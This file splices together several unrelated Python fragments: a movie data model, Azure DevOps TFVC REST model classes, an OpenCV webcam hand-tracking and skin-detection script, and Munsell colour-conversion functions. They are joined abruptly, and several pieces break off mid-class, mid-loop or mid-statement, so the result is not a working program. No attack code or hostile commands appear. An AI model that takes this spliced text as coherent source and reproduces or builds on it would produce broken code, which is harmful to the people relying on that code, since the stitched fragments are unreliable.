def __init__(self, movie_id=None, title=None, casts=None, plot_id=None, thumbnail_ids=None, photo_ids=None, video_ids=None, avg_rating=None, num_rating=None,):
self.movie_id = movie_id
self.title = title
self.casts = casts
self.plot_id = plot_id
self.thumbnail_ids = thumbnail_ids
self.photo_ids = photo_ids
self.video_ids = video_ids
self.avg_rating = avg_rating
self.num_rating = num_rating
def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
'version_type': {'key': 'versionType', 'type': 'object'}
}
def __init__(self, path=None, recursion_level=None, version=None, version_option=None, version_type=None):
super(TfvcItemDescriptor, self).__init__()
self.path = path
self.recursion_level = recursion_level
self.version = version
self.version_option = version_option
self.version_type = version_type
class TfvcItemRequestData(Model):
"""TfvcItemRequestData.
:param include_content_metadata: If true, include metadata about the file type
:type include_content_metadata: bool
:param include_links: Whether to include the _links field on the shallow references
:type include_links: bool
:param item_descriptors:
:type item_descriptors: list of :class:`TfvcItemDescriptor <azure.devops.v5_0.tfvc.models.TfvcItemDescriptor>`
"""
_attribute_map = {
'include_content_metadata': {'key': 'includeContentMetadata', 'type': 'bool'},
'include_links': {'key': 'includeLinks', 'type': 'bool'},
'item_descriptors': {'key': 'itemDescriptors', 'type': '[TfvcItemDescriptor]'}
}
def __init__(self, include_content_metadata=None, include_links=None, item_descriptors=None):
super(TfvcItemRequestData, self).__init__()
self.include_content_metadata = include_content_metadata
self.include_links = include_links
self.item_descriptors = item_descriptors
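# A minimal construction sketch (added; the path value is illustrative). These
# model classes are plain data holders; each _attribute_map entry pairs a
# snake_case attribute with the camelCase key the REST client uses for JSON
# (de)serialization.
def _example_item_request():
    return TfvcItemRequestData(
        include_content_metadata=True,
        include_links=False,
        item_descriptors=[TfvcItemDescriptor(path='$/Project/README.md')],
    )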
class TfvcLabelRef(Model):
"""TfvcLabelRef.
:param _links: Collection of reference links.
:type _links: :class:`ReferenceLinks <azure.devops.v5_0.tfvc.models.ReferenceLinks>`
:param description: Label description.
:type description: str
:param id: Label Id.
:type id: int
:param label_scope: Label scope.
:type label_scope: str
:param modified_date: Last modified datetime for the label.
:type modified_date: datetime
:param name: Label name.
:type name: str
:param owner: Label owner.
:type owner: :class:`IdentityRef <azure.devops.v5_0.tfvc.models.IdentityRef>`
:param url: Label Url.
:type url: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'description': {'key': 'description', 'type': 'str'},
'id': {'key': 'id', 'type': 'int'},
'label_scope': {'key': 'labelScope', 'type': 'str'},
'modified_date': {'key': 'modifiedDate', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'IdentityRef'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, _links=None, description=None, id=None, label_scope=None, modified_date=None, name=None, owner=None, url=None):
super(TfvcLabelRef, self).__init__()
self._links = _links
self.description = description
self.id = id
self.label_scope = label_scope
self.modified_date = modified_date
self.name = name
self.owner = owner
self.url = url
class TfvcLabelRequestData(Model):
"""TfvcLabelRequestData.
:param include_links: Whether to include the _links field on the shallow references
:type include_links: bool
:param item_label_filter:
:type item_label_filter: str
:param label_scope:
:type label_scope: str
:param max_item_count:
:type max_item_count: int
:param name:
:type name: str
:param owner:
:type owner: str
"""
_attribute_map = {
'include_links': {'key': 'includeLinks', 'type': 'bool'},
'item_label_filter': {'key': 'itemLabelFilter', 'type': 'str'},
'label_scope': {'key': 'labelScope', 'type': 'str'},
'max_item_count': {'key': 'maxItemCount', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'str'}
}
def __init__(self, include_links=None, item_label_filter=None, label_scope=None, max_item_count=None, name=None, owner=None):
super(TfvcLabelRequestData, self).__init__()
self.include_links = include_links
self.item_label_filter = item_label_filter
self.label_scope = label_scope
self.max_item_count = max_item_count
self.name = name
self.owner = owner
class TfvcMappingFilter(Model):
"""TfvcMappingFilter.
:param exclude: True if ServerPath should be excluded.
:type exclude: bool
:param server_path: Path to be included or excluded.
:type server_path: str
"""
_attribute_map = {
'exclude': {'key': 'exclude', 'type': 'bool'},
'server_path': {'key': 'serverPath', 'type': 'str'}
}
def __init__(self, exclude=None, server_path=None):
super(TfvcMappingFilter, self).__init__()
self.exclude = exclude
self.server_path = server_path
class TfvcMergeSource(Model):
"""TfvcMergeSource.
:param is_rename: Indicates if this a rename source. If false, it is a merge source.
:type is_rename: bool
:param server_item: The server item of the merge source.
:type server_item: str
:param version_from: Start of the version range.
:type version_from: int
:param version_to: End of the version range.
:type version_to: int
"""
_attribute_map = {
'is_rename': {'key': 'isRename', 'type': 'bool'},
'server_item': {'key': 'serverItem', 'type': 'str'},
'version_from': {'key': 'versionFrom', 'type': 'int'},
'version_to': {'key': 'versionTo', 'type': 'int'}
}
def __init__(self, is_rename=None, server_item=None, version_from=None, version_to=None):
super(TfvcMergeSource, self).__init__()
self.is_rename = is_rename
self.server_item = server_item
self.version_from = version_from
self.version_to = version_to
class TfvcPolicyFailureInfo(Model):
"""TfvcPolicyFailureInfo.
:param message: Policy failure message.
:type message: str
:param policy_name: Name of the policy that failed.
:type policy_name: str
"""
_attribute_map = {
'message': {'key': 'message', 'type': 'str'},
'policy_name': {'key': 'policyName', 'type': 'str'}
}
def __init__(self, message=None, policy_name=None):
super(TfvcPolicyFailureInfo, self).__init__()
self.message = message
self.policy_name = policy_name
class TfvcPolicyOverrideInfo(Model):
"""TfvcPolicyOverrideInfo.
    :param comment: Overridden policy comment.
:type comment: str
:param policy_failures: Information on the failed policy that was overridden.
:type policy_failures: list of :class:`TfvcPolicyFailureInfo <azure.devops.v5_0.tfvc.models.TfvcPolicyFailureInfo>`
"""
_attribute_map = {
'comment': {'key': 'comment', 'type': 'str'},
'policy_failures': {'key': 'policyFailures', 'type': '[TfvcPolicyFailureInfo]'}
}
def __init__(self, comment=None, policy_failures=None):
super(TfvcPolicyOverrideInfo, self).__init__()
self.comment = comment
self.policy_failures = policy_failures
class TfvcShallowBranchRef(Model):
"""TfvcShallowBranchRef.
:param path: Path for the branch.
:type path: str
"""
_attribute_map = {
'path': {'key': 'path', 'type': 'str'}
}
def __init__(self, path=None):
super(TfvcShallowBranchRef, self).__init__()
self.path = path
class TfvcShelvesetRef(Model):
"""TfvcShelvesetRef.
:param _links: List of reference links for the shelveset.
:type _links: :class:`ReferenceLinks <azure.devops.v5_0.tfvc.models.ReferenceLinks>`
:param comment: Shelveset comment.
:type comment: str
:param comment_truncated: Shelveset comment truncated as applicable.
:type comment_truncated: bool
:param created_date: Shelveset create date.
:type created_date: datetime
:param id: Shelveset Id.
:type id: str
:param name: Shelveset name.
:type name: str
:param owner: Shelveset Owner.
:type owner: :class:`IdentityRef <azure.devops.v5_0.tfvc.models.IdentityRef>`
:param url: Shelveset Url.
:type url: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'comment': {'key': 'comment', 'type': 'str'},
'comment_truncated': {'key': 'commentTruncated', 'type': 'bool'},
'created_date': {'key': 'createdDate', 'type': 'iso-8601'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'IdentityRef'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, _links=None, comment=None, comment_truncated=None, created_date=None, id=None, name=None, owner=None, url=None):
super(TfvcShelvesetRef, self).__init__()
self._links = _links
self.comment = comment
self.comment_truncated = comment_truncated
self.created_date = created_date
self.id = id
self.name = name
self.owner = owner
self.url = url
class TfvcShelvesetRequestData(Model):
"""TfvcShelvesetRequestData.
    :param include_details: Whether to include policyOverride and notes. Only applies when requesting a single deep shelveset
:type include_details: bool
:param include_links: Whether to include the _links field on the shallow references. Does not apply when requesting a single deep shelveset object. Links will always be included in the deep shelveset.
:type include_links: bool
:param include_work_items: Whether to include workItems
:type include_work_items: bool
:param max_change_count: Max number of changes to include
:type max_change_count: int
:param max_comment_length: Max length of comment
:type max_comment_length: int
:param name: Shelveset name
:type name: str
:param owner: Owner's ID. Could be a name or a guid.
:type owner: str
"""
_attribute_map = {
'include_details': {'key': 'includeDetails', 'type': 'bool'},
'include_links': {'key': 'includeLinks', 'type': 'bool'},
'include_work_items': {'key': 'includeWorkItems', 'type': 'bool'},
'max_change_count': {'key': 'maxChangeCount', 'type': 'int'},
'max_comment_length': {'key': 'maxCommentLength', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'str'}
}
def __init__(self, include_details=None, include_links=None, include_work_items=None, max_change_count=None, max_comment_length=None, name=None, owner=None):
super(TfvcShelvesetRequestData, self).__init__()
self.include_details = include_details
self.include_links = include_links
self.include_work_items = include_work_items
self.max_change_count = max_change_count
self.max_comment_length = max_comment_length
self.name = name
self.owner = owner
class TfvcStatistics(Model):
"""TfvcStatistics.
:param changeset_id: Id of the last changeset the stats are based on.
:type changeset_id: int
:param file_count_total: Count of files at the requested scope.
:type file_count_total: long
"""
_attribute_map = {
'changeset_id': {'key': 'changesetId', 'type': 'int'},
'file_count_total': {'key': 'fileCountTotal', 'type': 'long'}
}
def __init__(self, changeset_id=None, file_count_total=None):
super(TfvcStatistics, self).__init__()
self.changeset_id = changeset_id
self.file_count_total = file_count_total
class TfvcVersionDescriptor(Model):
"""TfvcVersionDescriptor.
:param version: Version object.
:type version: str
:param version_option:
:type version_option: object
:param version_type:
:type version_type: object
"""
_attribute_map = {
'version': {'key': 'version', 'type': 'str'},
'version_option': {'key': 'versionOption', 'type': 'object'},
'version_type': {'key': 'versionType', 'type': 'object'}
}
def __init__(self, version=None, version_option=None, version_type=None):
super(TfvcVersionDescriptor, self).__init__()
self.version = version
self.version_option = version_option
self.version_type = version_type
class VersionControlProjectInfo(Model):
"""VersionControlProjectInfo.
:param default_source_control_type:
:type default_source_control_type: object
:param project:
:type project: :class:`TeamProjectReference <azure.devops.v5_0.tfvc.models.TeamProjectReference>`
:param supports_git:
:type supports_git: bool
:param supports_tFVC:
:type supports_tFVC: bool
"""
_attribute_map = {
'default_source_control_type': {'key': 'defaultSourceControlType', 'type': 'object'},
'project': {'key': 'project', 'type': 'TeamProjectReference'},
'supports_git': {'key': 'supportsGit', 'type': 'bool'},
'supports_tFVC': {'key': 'supportsTFVC', 'type': 'bool'}
}
def __init__(self, default_source_control_type=None, project=None, supports_git=None, supports_tFVC=None):
super(VersionControlProjectInfo, self).__init__()
self.default_source_control_type = default_source_control_type
self.project = project
self.supports_git = supports_git
self.supports_tFVC = supports_tFVC
class VstsInfo(Model):
"""VstsInfo.
:param collection:
:type collection: :class:`TeamProjectCollectionReference <azure.devops.v5_0.tfvc.models.TeamProjectCollectionReference>`
:param repository:
:type repository: :class:`GitRepository <azure.devops.v5_0.tfvc.models.GitRepository>`
:param server_url:
:type server_url: str
"""
_attribute_map = {
'collection': {'key': 'collection', 'type': 'TeamProjectCollectionReference'},
'repository': {'key': 'repository', 'type': 'GitRepository'},
'server_url': {'key': 'serverUrl', 'type': 'str'}
}
def __init__(self, collection=None, repository=None, server_url=None):
super(VstsInfo, self).__init__()
self.collection = collection
self.repository = repository
self.server_url = server_url
class TfvcBranchRef(TfvcShallowBranchRef):
"""TfvcBranchRef.
:param path: Path for the branch.
:type path: str
:param _links: A collection of REST reference links.
:type _links: :class:`ReferenceLinks <azure.devops.v5_0.tfvc.models.ReferenceLinks>`
:param created_date: Creation date of the branch.
:type created_date: datetime
:param description: Branch description.
:type description: str
:param is_deleted: Is the branch deleted?
:type is_deleted: bool
:param owner: Alias or display name of user
:type owner: :class:`IdentityRef <azure.devops.v5_0.tfvc.models.IdentityRef>`
:param url: URL to retrieve the item.
:type url: str
"""
_attribute_map = {
'path': {'key': 'path', 'type': 'str'},
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
import cv2
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime
from mpl_toolkits.mplot3d import Axes3D
#import time
# Initialize webcam input
cap = cv2.VideoCapture(0)
# Initialize video input
#cap = cv2.VideoCapture("C:/Users/liangx/Documents/Dunhill Project Data/Single Sign/Stomach/FARM.mp4")
#cap = cv2.VideoCapture("C:/Users/liangx/Documents/Dunhill Project Data/Single Sign/Below Waist/LAP.mp4")
#cap = cv2.VideoCapture("C:/Users/liangx/Documents/Dunhill Project Data/Restricted/L2n.mov")
#cap = cv2.VideoCapture("C:/Users/liangx/Documents/Dunhill Project Data/Single Sign/Pronated Wrist/WATCH2.mp4")
# Set different colour conversion models {1 : HSV, 2 : YCrCb, 3 : LAB, 4 : XYZ}
COLOUR_MODEL = 1
# Set tracking delay (i.e. delay in number of frames) to let KNN background subtraction work (Camera: 30; Video: 5)
DELAY = 10
# Set contour radius to denoise; only contours big enough are tracked (Camera: 45-55, adjust the value depending on the distance between the tracked object and the camera; Video: 35)
RADIUS = 40
# Set frame count number for tracking trail reset (when no hands are detected)
FRAME = 100
# Initialize frame count
frame_count = 0
# Get video/camera input details
"""
lengthVideo = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
widthVideo = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
heightVideo = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# fps for video input with a stream header (need nb_frames field)
fpsVideo = int(cap.get(cv2.CAP_PROP_FPS))
# fps for camera input without a stream header
# Number of frames to capture
num_frames = 120;
print ("Capturing {0} frames".format(num_frames))
# Start time
start = time.time()
# Grab a few frames
for i in range(0, num_frames):
ret, frame = cap.read()
# End time
end = time.time()
# Time elapsed
seconds = end - start
print ("Time taken : {0} seconds".format(seconds))
# Calculate frames per second
fpsCamera = int(num_frames / seconds)
print ("Estimated frames per second : {0}".format(fpsCamera))
"""
# Create empty points array for hand trajectories tracking
points_left = []
points_right = []
# Initialize K-Nearest Neighbors (KNN) background subtractor
#kernel_bgsub = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))
#fgbg = cv2.createBackgroundSubtractorKNN()
# returns the elapsed milliseconds since the start of the program
def milliseconds():
dt = datetime.now() - start_time
ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0
return ms
# Sorting contour by area
def get_contour_areas(contours):
# returns the areas of all contours as list
all_areas = []
for cnt in contours:
area = cv2.contourArea(cnt)
all_areas.append(area)
return all_areas
# Sorting contour by position
def x_cord_contour(contours):
    #Returns the X coordinate of the contour centroid
M = cv2.moments(contours)
return (int(M['m10']/M['m00']))
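# Note (added): cv2.moments yields m00 == 0 for degenerate contours, which would
# make x_cord_contour above divide by zero; a guarded variant is sketched here as
# an assumption, not part of the original script.
def x_cord_contour_safe(contour):
    M = cv2.moments(contour)
    return int(M['m10'] / M['m00']) if M['m00'] != 0 else 0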
#Plot trajectories X-Y
def plot_trajectories(center,str, clr):
xs = [x[0] for x in center]
ys = [x[1] for x in center]
plt.plot(xs, ys, color= clr)
plt.xlabel('X')
plt.ylabel('Y')
plt.title(str + ' hand trajectories')
    plt.gca().invert_yaxis() #Reverse Y-Axis in PyPlot (OpenCV's image coordinate origin is the top-left corner)
#plt.gca().invert_xaxis() #Reverse X-Axis in PyPlot (Make trajectories like a Mirror View)
plt.show()
return None
#Plot trajectories with time
def plot_trajectories_vstime(center,str):
xs = [x[0] for x in center]
ys = [x[1] for x in center]
ts = [x[2] for x in center]
plt.plot(ts, xs, color='b', marker ='o',label='$X-Trajectory$')
plt.plot(ts, ys, color='y', marker ='^',label='$Y-Trajectory$')
plt.xlabel('Time')
plt.ylabel('X-Y')
plt.title(str + ' hand trajectories')
    plt.gca().invert_yaxis() #Reverse Y-Axis in PyPlot (y reverted because OpenCV's image origin is the top-left corner; x would be reverted for a mirror view)
#plt.gca().invert_xaxis() #Reverse X-Axis in PyPlot (Make trajectories like a Mirror View)
plt.legend(loc='upper right')
plt.show()
return None
#Plot 3D trajectories with Timeline on marker
"""
def plot_trajectories_3d(center, str, clr):
xs = [x[0] for x in center]
ys = [x[1] for x in center]
ts = [x[2] for x in center]
fig = plt.figure()
ax = plt.axes(projection='3d')
#ax.plot3D(xs, ys, dates.date2num(ts), 'gray')
ax.plot3D(xs, np.arange(0, len(xs)), ys, color= clr, marker ='o')
ax.set_xlabel('X')
ax.set_ylabel('Time (H:M:S)')
ax.set_zlabel('Y')
ax.set_title(str + '-Trajectory')
plt.gca().invert_zaxis() #Reverse Z-Axis in PyPlot (to revert y)
#plt.gca().invert_xaxis() #Reverse X-Axis in PyPlot (Make trajectories like a Mirror View)
    # place text annotations for timestamp on a 3D plot ([ts] in hour:min:sec format)
for x, y, z, label in zip(xs, np.arange(0, len(xs)), ys, ts):
ax.text(x, y, z, label)
plt.show()
return None
"""
#Plot 3D trajectories with Timeline in Y
def plot_trajectories_3d(center, str, clr):
xs = [x[0] for x in center]
ys = [x[1] for x in center]
ts = [x[2] for x in center]
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.plot3D(xs, ts, ys, color= clr, marker ='o')
#ax.set_yticks =(0, -1, 100)
ax.set_xlabel('X')
ax.set_ylabel('Time (ms)')
ax.set_zlabel('Y')
ax.set_title(str + '-Trajectory')
plt.gca().invert_zaxis() #Reverse Z-Axis in PyPlot (to revert y)
#plt.gca().invert_xaxis() #Reverse X-Axis in PyPlot (Make trajectories like a Mirror View)
plt.show()
return None
# define the different colour conversion function blocks: from RGB/BGR to HSV/YCrCb/LAB/XYZ
def HSV():
con_img = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
cv2.imshow('HSV Colour Model Image:', con_img)
return con_img
# map the inputs to the different colour conversion function blocks
options = {1 : HSV,
}
# define the different colour conversion thresholds
def HSV_thre():
# Selected Value sets
low_thresh = np.array([0, 48, 80], dtype = "uint8")
up_thresh = np.array([20, 255, 255], dtype = "uint8")
#low_thresh = np.array([0, 10, 60], dtype = "uint8")
#up_thresh = np.array([20, 150, 255], dtype = "uint8")
#DeepGaze Threshold (too much yellow)
#low_thresh = np.array([0, 58, 50], dtype = "uint8")
#up_thresh = np.array([30, 250, 255], dtype = "uint8")
return low_thresh, up_thresh
# map the inputs to the different colour conversion thresholds
options_thre = {1 : HSV_thre,
}
#Set lower_thresh, upper_thresh for the chosen colour conversion model
lower_thresh, upper_thresh = options_thre[COLOUR_MODEL]()
# Get current date & time
DATE= datetime.now().strftime('%Y:%m:%d')
start_time = datetime.now()
# Loop video capture until the break statement is executed
while cap.isOpened():
# Read webcam/video image
ret, frame = cap.read()
# when there is a video input
if ret == True:
# Get default camera/video window size
Height, Width = frame.shape[:2]
        #The chosen colour conversion function block is invoked:
converted_img = options[COLOUR_MODEL]()
# Face Detection Using HAAR CASCADE
hc_face = cv2.CascadeClassifier("C:/Users/liangx/source/repos/Skin Detection/haarcascade_frontalface_alt/haarcascade_frontalface_alt.xml")
faces = hc_face.detectMultiScale(converted_img)
for (x,y,w,h) in faces:
# If we do not draw a box on face, then use the code below
#cv2.rectangle(converted_img, (x,y), (x+w,y+h), 255, thickness=2)
# If we draw a box on face to avoid face skin detection, then use the code below
cv2.rectangle(converted_img, (x,y-30), (x+w+10, y+h+50), (255,255,255), -1)
            crop_img = frame[y+2:y+h, x+2:x+w]
cv2.imshow('Face Detection', crop_img)
# Use inRange to capture only the values between lower & upper_thresh for skin detection
mask = cv2.inRange(converted_img, lower_thresh, upper_thresh)
# Adding morphology effects to denoise
kernel_morphology =np.ones((5, 5), np.uint8)
mask = cv2.erode(mask, kernel_morphology, iterations=1)
#mask=cv2.morphologyEx(mask,cv2.MORPH_OPEN, kernel_morphology)
mask=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel_morphology)
mask = cv2.dilate(mask, kernel_morphology, iterations=1)
cv2.imshow('Skin colour + Morpho Mask', mask)
# Perform Bitwise AND on mask and original frame
# rest1 is the results after applying morphology effects + skin filtering
rest1 = cv2.bitwise_and(frame, frame, mask= mask)
        # Apply KNN background subtraction to refine the skin filtering result, i.e. to further remove static skin-colour-related background (the face fades out if it does not move)
#fgmask = fgbg.apply(rest1)
#fgmask = cv2.morphologyEx(fgmask, cv2.MORPH_OPEN, kernel_bgsub)
#cv2.imshow('Background subtraction + Skin colour + Morpho Mask',fgmask)
# Perform Bitwise AND on fgmask and rest1 frame
# rest2 is results after applying background subtraction + morphology effects + skin filtering
#rest2 = cv2.bitwise_and(rest1, rest1, mask= fgmask)
        # Find contours on fgmask
        # cv2.RETR_EXTERNAL finds external contours only; cv2.CHAIN_APPROX_SIMPLE only provides start and end points of bounding contours, thus resulting in much more efficient storage of contour information.
        #_, contours, _ = cv2.findContours(fgmask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
        # Find contours on mask
        # Note: the three-value return signature below is OpenCV 3.x; OpenCV 4.x returns only (contours, hierarchy)
        _, contours, _ = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
        print("Number of contours found = ", len(contours))
        #print(type(contours)) #The variable 'contours' is a list of numpy arrays of (x,y) points, one array per contour
# Draw all Contours found
#cv2.drawContours(rest2, contours, -1, (0,255,0), 3)
#cv2.imshow('All Contours filtered by skin color and background subtraction', rest2)
#cv2.imshow('Original', frame)
# When both hands are detected
if len(contours) >=2:
# Get the largest two contours and its center (i.e. two hands)
sorted_contours = sorted(contours, key=cv2.contourArea, reverse=True)[:2]
# Sort by reverse=True, using our x_cord_contour function (i.e. hands tracking from left to right)
contours_left_to_right = sorted(sorted_contours, key = x_cord_contour, reverse = True)
# Iterate over two contours and draw one at a time
for (i,c) in enumerate(contours_left_to_right):
                # Draw Convex Hull Contour
0.5, nan, nan])
"""
specification = as_float_array(specification)
if is_grey_munsell_colour(specification):
return specification * np.array([np.nan, 1, np.nan, np.nan])
else:
hue, value, chroma, code = specification
if hue == 0:
# 0YR is equivalent to 10R.
hue, code = 10, (code + 1) % 10
if chroma == 0:
return tstack([np.nan, value, np.nan, np.nan])
else:
return tstack([hue, value, chroma, code])
def munsell_colour_to_munsell_specification(munsell_colour: str) -> NDArray:
"""
Retrieve a normalised *Munsell* *Colorlab* specification from given
*Munsell* colour.
Parameters
----------
munsell_colour
*Munsell* colour.
Returns
-------
:class:`numpy.ndarray`
Normalised *Munsell* *Colorlab* specification.
Examples
--------
>>> munsell_colour_to_munsell_specification('N5.2')
array([ nan, 5.2, nan, nan])
>>> munsell_colour_to_munsell_specification('0YR 2.0/4.0')
array([ 10., 2., 4., 7.])
"""
return normalise_munsell_specification(
parse_munsell_colour(munsell_colour)
)
def munsell_specification_to_munsell_colour(
specification: ArrayLike,
hue_decimals: Integer = 1,
value_decimals: Integer = 1,
chroma_decimals: Integer = 1,
) -> str:
"""
Convert from *Munsell* *Colorlab* specification to given *Munsell* colour.
Parameters
----------
specification
*Munsell* *Colorlab* specification.
hue_decimals
Hue formatting decimals.
value_decimals
Value formatting decimals.
chroma_decimals
Chroma formatting decimals.
Returns
-------
:class:`str`
*Munsell* colour.
Examples
--------
>>> munsell_specification_to_munsell_colour(
... np.array([np.nan, 5.2, np.nan, np.nan]))
'N5.2'
>>> munsell_specification_to_munsell_colour(
... np.array([10, 2.0, 4.0, 7]))
'10.0R 2.0/4.0'
"""
hue, value, chroma, code = tsplit(
normalise_munsell_specification(specification)
)
if is_grey_munsell_colour(specification):
return MUNSELL_GRAY_EXTENDED_FORMAT.format(value, value_decimals)
else:
hue = round(hue, hue_decimals)
attest(
0 <= hue <= 10,
f'"{specification!r}" specification hue must be normalised to '
f"domain [0, 10]!",
)
value = round(value, value_decimals)
attest(
0 <= value <= 10,
f'"{specification!r}" specification value must be normalised to '
f"domain [0, 10]!",
)
chroma = round(chroma, chroma_decimals)
attest(
2 <= chroma <= 50,
f'"{specification!r}" specification chroma must be normalised to '
f"domain [2, 50]!",
)
code_values = MUNSELL_HUE_LETTER_CODES.values()
code = round(code, 1)
attest(
code in code_values,
f'"{specification!r}" specification code must one of '
f'"{code_values}"!',
)
if value == 0:
return MUNSELL_GRAY_EXTENDED_FORMAT.format(value, value_decimals)
else:
hue_letter = MUNSELL_HUE_LETTER_CODES.first_key_from_value(code)
return MUNSELL_COLOUR_EXTENDED_FORMAT.format(
hue,
hue_decimals,
hue_letter,
value,
value_decimals,
chroma,
chroma_decimals,
)
def xyY_from_renotation(specification: ArrayLike) -> NDArray:
"""
Return given existing *Munsell* *Colorlab* specification *CIE xyY*
colourspace vector from *Munsell Renotation System* data.
Parameters
----------
specification
*Munsell* *Colorlab* specification.
Returns
-------
:class:`numpy.ndarray`
*CIE xyY* colourspace vector.
Raises
------
ValueError
If the given specification doesn't exist in *Munsell Renotation System*
data.
Examples
--------
>>> xyY_from_renotation(np.array([2.5, 0.2, 2.0, 4])) # doctest: +ELLIPSIS
array([ 0.71..., 1.41..., 0.23...])
"""
specification = normalise_munsell_specification(specification)
try:
index = np.where(
(_munsell_specifications() == specification).all(axis=-1)
)
return MUNSELL_COLOURS_ALL[int(index[0])][1]
except Exception:
raise ValueError(
f'"{specification}" specification does not exists in '
'"Munsell Renotation System" data!'
)
def is_specification_in_renotation(specification: ArrayLike) -> Boolean:
"""
Return whether given *Munsell* *Colorlab* specification is in
*Munsell Renotation System* data.
Parameters
----------
specification
*Munsell* *Colorlab* specification.
Returns
-------
:class:`bool`
Whether specification is in *Munsell Renotation System* data.
Examples
--------
>>> is_specification_in_renotation(np.array([2.5, 0.2, 2.0, 4]))
True
>>> is_specification_in_renotation(np.array([64, 0.2, 2.0, 4]))
False
"""
try:
xyY_from_renotation(specification)
return True
except ValueError:
return False
def bounding_hues_from_renotation(hue_and_code: ArrayLike) -> NDArray:
"""
Return for a given *Munsell* *Colorlab* specification hue and *Munsell*
*Colorlab* specification code the two bounding hues from
*Munsell Renotation System* data.
Parameters
----------
hue_and_code
*Munsell* *Colorlab* specification hue and *Munsell* *Colorlab*
specification code.
Returns
-------
:class:`numpy.ndarray`
Bounding hues.
References
----------
:cite:`Centore2014o`
Examples
--------
>>> bounding_hues_from_renotation([3.2, 4])
array([[ 2.5, 4. ],
[ 5. , 4. ]])
# Coverage Doctests
>>> bounding_hues_from_renotation([0.0, 1])
array([[ 10., 2.],
[ 10., 2.]])
"""
hue, code = as_float_array(hue_and_code)
hue_cw: Floating
code_cw: Floating
hue_ccw: Floating
code_ccw: Floating
if hue % 2.5 == 0:
if hue == 0:
hue_cw = 10
code_cw = (code + 1) % 10
else:
hue_cw = hue
code_cw = code
hue_ccw = hue_cw
code_ccw = code_cw
else:
hue_cw = 2.5 * np.floor(hue / 2.5)
hue_ccw = (hue_cw + 2.5) % 10
if hue_ccw == 0:
hue_ccw = 10
if hue_cw == 0:
hue_cw = 10
code_cw = (code + 1) % 10
if code_cw == 0:
code_cw = 10
else:
code_cw = code
code_ccw = code
return as_float_array([(hue_cw, code_cw), (hue_ccw, code_ccw)])
def hue_to_hue_angle(hue_and_code: ArrayLike) -> Floating:
"""
Convert from the *Munsell* *Colorlab* specification hue and *Munsell*
*Colorlab* specification code to hue angle in degrees.
Parameters
----------
hue_and_code
*Munsell* *Colorlab* specification hue and *Munsell* *Colorlab*
specification code.
Returns
-------
:class:`numpy.floating`
Hue angle in degrees.
References
----------
:cite:`Centore2014s`
Examples
--------
>>> hue_to_hue_angle([3.2, 4])
65.5
"""
hue, code = as_float_array(hue_and_code)
single_hue = ((17 - code) % 10 + (hue / 10) - 0.5) % 10
hue_angle = LinearInterpolator(
[0, 2, 3, 4, 5, 6, 8, 9, 10], [0, 45, 70, 135, 160, 225, 255, 315, 360]
)(single_hue)
return as_float_scalar(hue_angle)
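# Worked example for the mapping above (values from the docstring): for
# [3.2, 4], single_hue = ((17 - 4) % 10 + 0.32 - 0.5) % 10 = 2.82, which the
# piecewise-linear map sends to 45 + 0.82 * (70 - 45) = 65.5 degrees.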
def hue_angle_to_hue(hue_angle: Floating) -> NDArray:
"""
Convert from hue angle in degrees to the *Munsell* *Colorlab*
specification hue and code.
Parameters
----------
hue_angle
Hue angle in degrees.
Returns
-------
:class:`numpy.ndarray`
(*Munsell* *Colorlab* specification hue, *Munsell* *Colorlab*
specification code).
References
----------
:cite:`Centore2014t`
Examples
--------
>>> hue_angle_to_hue(65.54) # doctest: +ELLIPSIS
array([ 3.216, 4. ])
"""
single_hue = LinearInterpolator(
[0, 45, 70, 135, 160, 225, 255, 315, 360], [0, 2, 3, 4, 5, 6, 8, 9, 10]
)(hue_angle)
if single_hue <= 0.5:
code = 7
elif single_hue <= 1.5:
code = 6
elif single_hue <= 2.5:
code = 5
elif single_hue <= 3.5:
code = 4
elif single_hue <= 4.5:
code = 3
elif single_hue <= 5.5:
code = 2
elif single_hue <= 6.5:
code = 1
elif single_hue <= 7.5:
code = 10
elif single_hue <= 8.5:
code = 9
elif single_hue <= 9.5:
code = 8
else:
code = 7
hue = (10 * (single_hue % 1) + 5) % 10
if hue == 0:
hue = 10
return tstack([hue, code])
def hue_to_ASTM_hue(hue_and_code: ArrayLike) -> Floating:
"""
Convert from the *Munsell* *Colorlab* specification hue and *Munsell*
    *Colorlab* specification code to *ASTM* hue number.
Parameters
----------
hue_and_code
*Munsell* *Colorlab* specification hue and *Munsell* *Colorlab*
specification code.
Returns
-------
:class:`numpy.floating`
*ASTM* hue number.
References
----------
:cite:`Centore2014k`
Examples
--------
>>> hue_to_ASTM_hue([3.2, 4]) # doctest: +ELLIPSIS
33.2...
"""
hue, code = as_float_array(hue_and_code)
ASTM_hue = 10 * ((7 - code) % 10) + hue
return 100 if ASTM_hue == 0 else ASTM_hue
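# Worked example for the formula above: for [3.2, 4],
# ASTM_hue = 10 * ((7 - 4) % 10) + 3.2 = 33.2, matching the docstring.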
def interpolation_method_from_renotation_ovoid(
specification: ArrayLike,
) -> Optional[Literal["Linear", "Radial"]]:
"""
